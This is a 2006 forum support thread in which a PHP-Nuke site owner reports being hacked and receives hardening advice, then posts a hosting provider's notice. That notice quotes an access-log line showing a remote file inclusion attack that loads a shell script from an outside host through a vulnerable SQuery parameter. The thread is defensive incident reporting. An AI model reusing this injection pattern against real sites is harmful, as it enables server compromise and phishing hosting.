Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.02.02 Distro
Author Message
swisschese
New Member
New Member


Joined: Jun 30, 2006
Posts: 21

PostPosted: Thu Sep 07, 2006 6:08 pm Reply with quote

Any tips?


[EDIT: image removed]


Anyone had this happen?


Thanks, i don't think that the forums are up to date.
 
View user's profile Send private message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Thu Sep 07, 2006 7:26 pm Reply with quote

There are many threads that you can consult here. Without further information there is little we can do. Nuke version? Forums version? Running Sentinel or not and what version? Have you looked in the logs? Any "third party" modules that let people upload?
 
View user's profile Send private message Visit poster's website
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

PostPosted: Thu Sep 07, 2006 7:28 pm Reply with quote

Install NukeSentinel, and put admin authentication on your admin.php file and modules/Forums/admin directory (search the forums here for specific instructions).

Check for any changed files, check your database. Change your control panel and nuke database passwords, which should be different.

I'll remove the picture from your post - there's no need to display offensive materials.

_________________
I google, therefore I exist...
Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
swisschese
PostPosted: Thu Sep 07, 2006 7:49 pm Reply with quote

Nuke : Raven's RavenNuke76 v2.02.02 Distro

Forums: phpBB 2.0.20. ( Not sure how to update )

Sentinel yes, NukeSentinel(tm) 2.4.2pl5

Logs, oh yeah, lots of IP's

Nothing to upload as i know of!
 
kguske
PostPosted: Thu Sep 07, 2006 7:52 pm Reply with quote

What about admin authentication on admin.php and modules/Forums/admin?
 
swisschese
PostPosted: Thu Sep 07, 2006 7:55 pm Reply with quote

I think it's broke...

My user login is gone... bleh
 
floppydrivez
Involved
Involved


Joined: Feb 26, 2006
Posts: 340
Location: Jackson, Mississippi

PostPosted: Thu Sep 07, 2006 8:05 pm Reply with quote

If you can get into cpanel, here are the instructions to password protect your forum admin folder.
Only registered users can see links on this board! Get registered or login!

admin_auth can be found here (under Apache is compiled as CGI, what more can I do?)
and probably a few other places on the forums.
Only registered users can see links on this board! Get registered or login!

_________________
Only registered users can see links on this board! Get registered or login!, Only registered users can see links on this board! Get registered or login!, Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
FireATST
RavenNuke(tm) Development Team


Joined: Jun 12, 2004
Posts: 637
Location: Ohio

PostPosted: Sat Sep 09, 2006 8:49 pm Reply with quote

upgrade your sentinel to the latest....Smile
 
View user's profile Send private message Visit poster's website MSN Messenger ICQ Number
swisschese
PostPosted: Mon Sep 11, 2006 10:58 pm Reply with quote

From: Only registered users can see links on this board! Get registered or login!
To:
Subject: C54836102 - 1&1 Internet Compliance -- Account Warning - Hacked
Date: Mon, 11 Sep 2006 08:16:04 -0400
>Dear Swiss Chese,
>
>It has come to our attention that your web space has been hacked and
>used to host a phishing site at
>http://www.xtremeidiots.com/www.paypal.com.webscr.phpcmd=LogIn//:
>
>access.log.36.gz:86.126.57.95 - - [10/Sep/2006:10:29:41 -0400] "GET
>/SQuery/lib/armygame.php?libpath=http://www.freewebtown.com/k
>aizenngo5/hack/shell.php.txt? HTTP/1.1" 200 6255 Only registered users can see links on this board! Get registered or login!
>"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
>; .NET CLR 1.1.4322)" "-"
>
>--
>
>The above was taken from your access logs. It shows that
>/SQuery/lib/armygame.php was used to perpetrate the hack.
>
>Please contact the developers for this script/application. You will
>likely need to install a version update and/or security patch to prevent
>further abuse.
>
>Also, reply to this email in acknowledgement of this issue. Failure to
>do so can result in your account being locked and possibly terminated.
>
>--
>Sincerely,
>Customer Compliance Operative
>1&1 Internet Inc.




I got hacked cause of a server viewier that i had.

Thank you for all the help... let this be a warning to all


SQUERY 4.0 game server viwer does have a big security holes!!!
 
swisschese
PostPosted: Tue Sep 12, 2006 3:28 am Reply with quote

I know there is no way i can upload the 2 files that i found on my comp. but it looks like a method that they are using to crack the adminhttp.. if any admin would like to take a look at it please let me know and i will send the 2 php files over to them to help make this more secure.

Thanks

SwisS
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

PostPosted: Tue Sep 12, 2006 6:35 am Reply with quote

swisschese, they got in through SQuery. Once "in" at the server level, HTTPAuth will not help you...

I would suggest signing up for the Secunia Advisory service at Only registered users can see links on this board! Get registered or login! SQuery was addressed Only registered users can see links on this board! Get registered or login!. An invaluable service for the webmaster. No guarantee they will cover every script, but just another resource.

Like I always say "your site is only as secure as its weakest link". It can be exhausting at times trying to keep up.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.02.02 Distro

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©